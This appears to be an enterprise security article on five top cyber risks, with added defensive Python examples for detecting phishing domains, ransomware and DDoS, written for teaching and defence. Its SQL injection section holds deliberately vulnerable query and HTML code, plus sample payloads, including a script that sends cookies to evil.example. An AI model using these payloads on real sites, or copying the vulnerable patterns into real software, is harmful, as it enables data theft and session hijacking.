As an enterprise security practitioner, the number of vulnerabilities and threats you have to tackle daily can be overwhelming. As the adage goes, an adversary needs only one small hole to crawl through, while defenders must protect the entire enterprise. To help you narrow your focus (realistically, protecting 100% of everything 100% of the time is impossible), we've highlighted the five cyber risks most likely to affect organizations today.
Phishing
It should come as no surprise that phishing is a top cyber risk. Tricking people into giving up secrets is a fraud as old as time. In the cyber realm, convincing people to click a malicious link, open a malicious attachment, or hand over network credentials is a simple matter of crafting a message or website that mimics a legitimate source. Minute details, such as a slightly altered sender address or web address, are easy to miss. Attackers also prey on human trust and curiosity with urgent (e.g., "Immediate action required! Your account will be closed!") and provocative (e.g., "Your FedEx shipment has been delayed") messages.
The best defense against phishing combines people and technology. Security teams should teach employees what phishing looks like, train them to spot phishing attempts and other fraudulent activity, and make reporting easy. Users should be encouraged to report suspected phishing, not punished if they fall victim: a user who fears blame will not report the click, and the response clock starts later.
At the same time, organizations should:
- Require multi-factor authentication, with phishing-resistant methods (hardware security keys/FIDO2) for privileged accounts, so that credentials pilfered through phishing cannot be used on their own. Note that one-time codes and push prompts can themselves be phished in real time by a relaying site, so MFA reduces the risk rather than eliminating it.
- Disallow password reuse across company systems, and check new passwords against lists of known-breached passwords.
- Invest in basic security technologies: email filtering (with SPF, DKIM, and DMARC published for your own domains), web protection, antivirus/EDR, IDS/IPS, firewalls, and network segmentation.
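The "slightly altered sender or web address" above is something a mail gateway or SOC script can check mechanically. The following is an added example written for this page, not code from the original article: it classifies a sender address or URL against a constructed allow-list of trusted domains (`TRUSTED_DOMAINS` is an assumption for the example), catching glyph swaps such as `rnicrosoft.com`, near-misses such as `example.co`, a trusted name used as a subdomain of an attacker's domain, and the `https://trusted.com@evil.example/` userinfo trick.

```python
import unicodedata
from urllib.parse import urlparse

# Constructed allow-list of domains the organisation actually corresponds with
# (an assumption for this example; a real deployment would load it from config).
TRUSTED_DOMAINS = {"example.com", "fedex.com", "microsoft.com"}

# Visual substitutions commonly used in lookalike domains, mapped back to the
# letters they imitate. Order matters: multi-character tricks are undone first.
# This will also "correct" legitimate digits in a name, which is acceptable
# because the result is only compared against the allow-list.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"),
              ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalise(domain: str) -> str:
    """Strip accents and undo common glyph tricks so that 'rnicrosoft.com'
    and 'micr0soft.com' both normalise to 'microsoft.com'."""
    folded = unicodedata.normalize("NFKD", domain.lower())
    folded = "".join(ch for ch in folded if not unicodedata.combining(ch))
    for fake, real in HOMOGLYPHS:
        folded = folded.replace(fake, real)
    return folded


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a distance of 1 catches 'example.co' vs 'example.com'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def extract_host(sender: str):
    """Pull the host out of an e-mail address or URL.

    Returns (host, has_userinfo). has_userinfo flags the
    'https://trusted.com@evil.example/' trick, where the part before '@'
    is just a username and the real host comes after it."""
    if "://" in sender:
        parsed = urlparse(sender)
        return (parsed.hostname or "").lower(), parsed.username is not None
    if "@" in sender:
        return sender.rsplit("@", 1)[1].lower(), False
    return sender.lower(), False


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Assumption: no public-suffix list is used,
    so names like 'example.co.uk' are not handled correctly here."""
    labels = host.strip(".").split(".")
    return ".".join(labels[-2:])


def classify_sender(sender: str) -> str:
    """Return 'trusted', 'lookalike', 'suspicious' or 'unknown'."""
    host, has_userinfo = extract_host(sender)
    if has_userinfo:
        return "suspicious"  # credentials-in-URL: the real host hides after '@'
    reg = registrable_domain(host)
    if reg in TRUSTED_DOMAINS:
        return "trusted"
    # Trusted name used as a subdomain of an attacker-controlled domain,
    # e.g. www.fedex.com.tracking-update.example
    for trusted in TRUSTED_DOMAINS:
        if "." + trusted + "." in "." + host + ".":
            return "lookalike"
    norm = normalise(reg)
    for trusted in TRUSTED_DOMAINS:
        if norm == trusted or levenshtein(norm, trusted) <= 1:
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for s in ["alerts@microsoft.com", "billing@rnicrosoft.com",
              "https://www.fedex.com.tracking-update.example/",
              "https://microsoft.com@evil.example/login", "news@example.co"]:
        print(f"{s:55} -> {classify_sender(s)}")
```

An "unknown" verdict is not a clean bill of health; it only means the domain is neither on the allow-list nor an obvious imitation of one, which is where reputation feeds and user reporting take over.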
Malware/Ransomware
Phishing is often the primary vector for malware or ransomware, but adversaries also exploit unpatched software, abuse insecure internal network protocols to spread laterally, and set up drive-by downloads to launch these attacks.
Today's malware is stealthy (except ransomware, where the objective is to make the victim aware of the attack and demand payment for the "safe return" of files). In most cases, the farther malware spreads, the more damage it can inflict. Its purposes are many: destroying or damaging files, stealing information, spying on users, disrupting system resources, and more. Removing malware and recovering from ransomware are hard, so the best measures are preventative:
- Keep software and systems patched and up to date, and obtain patches only from the vendor's official channels.
- Remove unnecessary or end-of-life software that can no longer be updated, and disable legacy protocols such as SMBv1 (the protocol abused by the 2017 WannaCry and NotPetya worms).
- Implement, monitor, and regularly test the standard controls: firewalls, IDS, anti-malware/anti-spyware, web filtering, and application allow-listing where practical.
- Disable AutoRun/AutoPlay for removable media, and configure browsers and email clients so that downloaded files and active content are never opened or executed automatically.
- Train employees to be on the lookout for social engineering.
- Back up sensitive files to an offline or otherwise isolated (air-gapped or immutable) location, encrypt the backups, and test restores regularly. A backup that ransomware can reach, or that cannot be restored, is not a backup.
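Prevention will eventually fail somewhere, and the "monitor" in the checklist above is what limits the blast radius. Ransomware has one behaviour almost nothing else on an endpoint shares: one process renaming many files to a new extension, across many directories, in seconds. The following is an added example, not code from the original article, that runs that detection over a constructed sample of file-activity events. The log format (`<timestamp> pid=... proc=... op=... src=... [dst=...]`) and the process names are assumptions for the example; real telemetry from an EDR or Sysmon would need its own parser.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from pathlib import PurePosixPath

# Constructed sample of file-activity events (not real telemetry). The line
# format is an assumption for this example. 'cryptor' renames files in three
# directories within 35 seconds; 'office' and 'logrotate' are benign noise.
SAMPLE_EVENTS = """\
2018-03-01T09:00:01 pid=4120 proc=office op=write src=/home/alice/docs/draft.docx
2018-03-01T09:00:03 pid=4120 proc=office op=rename src=/home/alice/docs/draft.docx dst=/home/alice/docs/final.docx
2018-03-01T09:00:05 pid=5301 proc=cryptor op=rename src=/srv/share/finance/budget.xlsx dst=/srv/share/finance/budget.xlsx.locked
2018-03-01T09:00:06 pid=5301 proc=cryptor op=rename src=/srv/share/finance/forecast.xlsx dst=/srv/share/finance/forecast.xlsx.locked
2018-03-01T09:00:08 pid=5301 proc=cryptor op=rename src=/srv/share/finance/payroll.csv dst=/srv/share/finance/payroll.csv.locked
2018-03-01T09:00:10 pid=777 proc=logrotate op=rename src=/var/log/app.log dst=/var/log/app.log.1
2018-03-01T09:00:11 pid=5301 proc=cryptor op=rename src=/srv/share/hr/handbook.docx dst=/srv/share/hr/handbook.docx.locked
2018-03-01T09:00:13 pid=5301 proc=cryptor op=rename src=/srv/share/hr/reviews.docx dst=/srv/share/hr/reviews.docx.locked
2018-03-01T09:00:20 pid=777 proc=logrotate op=rename src=/var/log/auth.log dst=/var/log/auth.log.1
2018-03-01T09:00:31 pid=5301 proc=cryptor op=rename src=/home/alice/docs/final.docx dst=/home/alice/docs/final.docx.locked
2018-03-01T09:00:40 pid=5301 proc=cryptor op=rename src=/home/alice/docs/thesis.pdf dst=/home/alice/docs/thesis.pdf.locked
this line is malformed on purpose and is skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) proc=(?P<proc>\S+) op=(?P<op>\w+) "
    r"src=(?P<src>\S+)(?: dst=(?P<dst>\S+))?$"
)


def parse_events(text: str) -> list:
    """Parse log lines into dicts; malformed lines are ignored rather than fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def extension_changed(src: str, dst: str) -> bool:
    """'budget.xlsx' -> 'budget.xlsx.locked' changes the suffix;
    'draft.docx' -> 'final.docx' does not."""
    return PurePosixPath(src).suffix != PurePosixPath(dst).suffix


def detect_mass_rename(events, window_s=60, min_files=5, min_dirs=2) -> dict:
    """Sliding window per process over extension-changing renames.

    A process that changes the extension of at least min_files files in at
    least min_dirs directories within window_s seconds is reported.
    Returns {pid: {"proc", "files", "dirs", "first_seen"}}."""
    recent = defaultdict(deque)  # pid -> renames inside the current window
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["op"] != "rename" or not ev["dst"]:
            continue
        if not extension_changed(ev["src"], ev["dst"]):
            continue
        window = recent[ev["pid"]]
        window.append(ev)
        while (ev["ts"] - window[0]["ts"]).total_seconds() > window_s:
            window.popleft()
        dirs = {str(PurePosixPath(e["src"]).parent) for e in window}
        if len(window) >= min_files and len(dirs) >= min_dirs:
            alert = alerts.setdefault(ev["pid"], {
                "proc": ev["proc"], "files": 0, "dirs": set(),
                "first_seen": window[0]["ts"].isoformat(),
            })
            alert["files"] = max(alert["files"], len(window))
            alert["dirs"] |= dirs
    return alerts


if __name__ == "__main__":
    for pid, a in detect_mass_rename(parse_events(SAMPLE_EVENTS)).items():
        print(f"ALERT pid={pid} proc={a['proc']} files={a['files']} "
              f"dirs={sorted(a['dirs'])} since {a['first_seen']}")
```

The thresholds are deliberately low so the sample trips them; on a real file server, tune them against a day of normal activity so that backup agents and archivers (which also rename many files) stay below the line, and have the alert trigger an automatic response such as killing the process or revoking the user's share access.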
Unpatched Software
Unpatched software is an easy entry point for attackers. The security industry even maintains a public, free catalog of disclosed vulnerabilities, including those in well-known and widely used software and systems: the Common Vulnerabilities and Exposures (CVE) list. Naturally, attackers read it too. With a vulnerability in hand, threat actors don't need to probe systems manually; the same vulnerability scanners defenders use to find weaknesses in their own organizations can be turned outward to identify exposed systems and software automatically.
The tools and techniques for finding vulnerabilities are largely the same for attackers and defenders, but attackers need only find one exploitable hole, while defenders must find and fix them all, so attackers are, quite simply, quicker at exploiting vulnerabilities than security teams are at patching them.
The reasons and excuses for poor patch management are plentiful, but it is often a matter of prioritization. Despite the known risk of unpatched and outdated systems and software, security teams either don't prioritize patching or can't, because of organizational resistance, which usually means the security team has not effectively communicated why patching matters.
For this class of risk there is only one surefire solution: patch, regularly and promptly, starting with internet-facing systems and with vulnerabilities for which a public exploit exists.
SQL Injection/Cross-Site Scripting
Year upon year, OWASP continues to list injection and cross-site scripting among its most prevalent application security risks. With applications quickly becoming a top business tool, organizations must be more diligent about shoring up application risks.
SQL is the query language applications use to talk to their backend databases. In a SQL injection attack, malicious input is incorporated into a query so that it changes the statement the database executes, letting the attacker read or modify data the application never intended to expose. These attacks are especially damaging when the database holds sensitive information, such as customer personally identifiable information or login credentials.
Cross-site scripting (XSS) is similar in that attacker-supplied input is injected into an application, but here the payload is script embedded in a web page, and the target is other users' browsers, which the attacker uses to redirect the user to a malicious website, hijack the user's session, and/or steal user data.
The best ways to protect against SQL injection and XSS are to:
- Use parameterized queries (prepared statements) so that user input is always handled as data and can never be interpreted as SQL.
- Validate user input against what the field should contain, and encode output for the context it is rendered in (HTML body, attribute, JavaScript). Output encoding, not input filtering, is the primary XSS defense.
- Avoid dynamic SQL; where a table or column name must vary, select it from a fixed allow-list in code rather than from user input.
- Do not store sensitive data in plaintext: hash passwords with a slow, salted algorithm (bcrypt, scrypt, or Argon2) and encrypt other secrets. Know the limit of this control: a SQL injection runs with the application's own database access, so anything the application decrypts for normal use is exposed anyway; encryption at rest mainly protects against stolen disks and backups.
- Implement a web application firewall as a compensating control while the code is fixed, not as a substitute for fixing it.
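To make the first and second points concrete, here is an added example (not code from the original article) that puts the vulnerable form of each beside its fix, using an in-memory SQLite database with constructed rows. The table layout, user names and placeholder hash strings are assumptions for the example; a real application would store bcrypt or Argon2 hashes.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows (not real data).
    The password_hash values are placeholders standing in for real hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-of-alice-password", "admin"),
         ("bob", "hash-of-bob-password", "user"),
         ("carol", "hash-of-carol-password", "user")],
    )
    return conn


def find_user_vulnerable(conn, username: str) -> list:
    """Dynamic SQL: the input is pasted into the statement text, so a quote in
    the input ends the string literal and the rest becomes SQL.
    Deliberately vulnerable; shown only for contrast."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str) -> list:
    """Parameterised query: the driver passes the value separately from the
    SQL text, so the database never parses user input as part of the statement."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def render_greeting_vulnerable(name: str) -> str:
    """Reflects user input straight into HTML: a stored or reflected XSS."""
    return "<p>Welcome back, " + name + "</p>"


def render_greeting_safe(name: str) -> str:
    """Encodes for the HTML-body context. Attribute and JavaScript contexts
    need their own encoders; one escape function does not fit all."""
    return "<p>Welcome back, " + html.escape(name, quote=True) + "</p>"


# Classic payloads, constructed for the demonstration.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "' UNION SELECT username, password_hash FROM users--"
XSS = "<script>document.location='https://evil.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology :", find_user_vulnerable(db, TAUTOLOGY))
    print("vulnerable, union dump:", find_user_vulnerable(db, UNION_DUMP))
    print("safe, tautology       :", find_user_safe(db, TAUTOLOGY))
    print("safe, real user       :", find_user_safe(db, "bob"))
    print(render_greeting_vulnerable(XSS))
    print(render_greeting_safe(XSS))
```

The tautology payload turns the lookup into `WHERE username = '' OR '1'='1'` and returns every row; the UNION payload returns the password hash column alongside the usernames, which is exactly the "expose the database" outcome described above. The parameterised version returns nothing for either payload because the whole string is compared as a literal username.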
Distributed Denial of Service
In late February 2018, the largest distributed denial-of-service (DDoS) attack on record, clocking in at a whopping 1.35 terabits per second, was aimed at GitHub. Then, a scant few days later, a new DDoS attack came along at 1.7 Tbps and said, "hold my beer." The latter was aimed at an unnamed U.S.-based internet service provider, which, like GitHub just days before, was able to stave off the flood. Both attacks leveraged exposed Memcached servers as amplifiers: a small request with a spoofed source address elicits a response tens of thousands of times larger, which the server sends to the victim.
The intent of a DDoS attack is to overwhelm a website or service with junk traffic until it cannot operate (properly or at all), preventing users from accessing the website, applications, or resources normally offered. Unlike the other attacks on this list, a DDoS attack is meant simply to cause disruption, cost the victim regular business, and damage its reputation.
DDoS attacks take several forms: volumetric floods, amplification/reflection, resource exhaustion at the connection or application layer, and malformed-packet attacks such as the classic "ping of death." Whatever the type, the techniques, volumes, and frequency of DDoS attacks appear to be constantly increasing, making this a top risk to organizations today.
To withstand a DDoS attack, companies should:
- Consider a DDoS mitigation service such as Akamai, Arbor Networks, or Cloudflare if the threat to your organization is deemed high; upstream scrubbing capacity is the only answer to a volumetric attack larger than your own links.
- Talk to your ISP about their DDoS detection and mitigation capabilities, and agree on who to call before you need them.
- Understand and baseline normal network and application behavior, monitor traffic continuously, and alert on deviations from that baseline.
- Implement perimeter protections: filter traffic you never expect (for example, inbound UDP from amplifier source ports such as Memcached's 11211), apply rate limits, and set lower connection thresholds.
- Institute, then test, a business continuity plan that covers a prolonged outage.
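The baseline-and-alert and packet-filtering points are easy to state and easy to get wrong, so here is an added example, not code from the original article, of both over constructed data. The per-minute request counts and the flow records are invented for the demonstration; the baseline threshold combines a standard-deviation test with a ratio guard, because a very steady baseline has a tiny standard deviation and would otherwise alert on harmless jitter. The second function groups inbound UDP by well-known amplifier source ports (Memcached 11211, NTP 123, SSDP 1900, chargen 19) to show which reflectors to filter at the edge; DNS (53) is left out of that list because legitimate resolver replies also come from it.

```python
import statistics
from collections import Counter

# Constructed per-minute request counts for a quiet period. Assumption: the
# window is representative; in practice keep a week or more and separate
# baselines per hour of day, since Monday 09:00 is not Sunday 03:00.
BASELINE_RPM = [980, 1010, 1005, 990, 1020, 1000, 995, 1015, 985, 1000, 1010, 990]

# Constructed live window: traffic ramps from normal into a flood.
LIVE_RPM = [1005, 995, 1200, 4800, 26000, 31000]

# UDP services that answer small queries with large responses and are abused
# as reflectors. DNS (53) is deliberately omitted: legitimate replies use it.
AMPLIFIER_PORTS = {11211: "memcached", 123: "ntp", 1900: "ssdp", 19: "chargen"}

# Constructed inbound flow summaries: (source_ip, source_port, protocol, bytes).
# Addresses are from the documentation ranges (RFC 5737).
FLOWS = [
    ("203.0.113.10", 11211, "udp", 1_400_000),
    ("203.0.113.11", 11211, "udp", 1_350_000),
    ("198.51.100.7", 123, "udp", 480_000),
    ("192.0.2.44", 443, "tcp", 52_000),
    ("192.0.2.45", 11211, "tcp", 9_000),   # TCP to memcached is not reflection
    ("198.51.100.9", 1900, "udp", 40_000), # below the reporting floor
]


def baseline(history):
    """Mean and population standard deviation of the historical counts."""
    return statistics.mean(history), statistics.pstdev(history)


def flood_threshold(history, k=5, min_ratio=3.0) -> float:
    """Alert line: mean + k standard deviations, but never lower than
    min_ratio times the mean, so a tight baseline cannot alert on jitter."""
    mean, sd = baseline(history)
    return max(mean + k * sd, mean * min_ratio)


def flood_alerts(history, live, k=5, min_ratio=3.0) -> list:
    """Return (minute_index, requests) for every live minute above the threshold."""
    threshold = flood_threshold(history, k, min_ratio)
    return [(i, rpm) for i, rpm in enumerate(live) if rpm > threshold]


def reflection_sources(flows, min_bytes=100_000) -> list:
    """Aggregate inbound UDP from amplifier ports by (service, source) and
    return the heaviest first. These are the reflectors to block upstream
    (by source port) while the attack is running."""
    totals = Counter()
    for src, sport, proto, nbytes in flows:
        if proto == "udp" and sport in AMPLIFIER_PORTS:
            totals[(AMPLIFIER_PORTS[sport], src)] += nbytes
    return [(svc, src, b) for (svc, src), b in totals.most_common() if b >= min_bytes]


if __name__ == "__main__":
    print("threshold: %.0f req/min" % flood_threshold(BASELINE_RPM))
    for minute, rpm in flood_alerts(BASELINE_RPM, LIVE_RPM):
        print(f"minute {minute}: {rpm} req/min exceeds baseline")
    for svc, src, nbytes in reflection_sources(FLOWS):
        print(f"reflector {svc:9} {src:15} {nbytes:>10} bytes")
```

With the constructed baseline (mean 1000, standard deviation about 12) the standard-deviation test alone would fire at roughly 1060 requests per minute, well inside a normal lunchtime spike; the ratio guard lifts the line to 3000, so only the flood minutes alert. Note that both checks are only as good as the sensor feeding them: once a volumetric attack saturates the upstream link, the monitoring inside the perimeter sees a drop, not a spike, which is why the ISP conversation above matters.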
Learn how to effectively identify and defend against threats to your organization at MISTI's Threat Intelligence Summit, Monday, July 23, 2018, in San Diego.